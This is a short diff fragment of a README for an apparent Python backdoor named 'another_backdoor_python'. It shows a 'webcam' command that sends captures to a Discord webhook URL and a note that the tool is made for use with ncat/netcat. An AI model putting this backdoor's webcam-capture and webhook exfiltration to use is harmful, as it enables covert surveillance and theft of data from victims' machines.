Thehacker-arch/another_backdoor_python/README.md

 [*] >> webcam https://discord.com/api/webhooks/your_webhook_url_that_u_copied

-NOTE:- THIS IS ESPECIALLY MADE FOR NCAT/NETCAT
+NOTE:- This is made for --> NCAT/NETCAT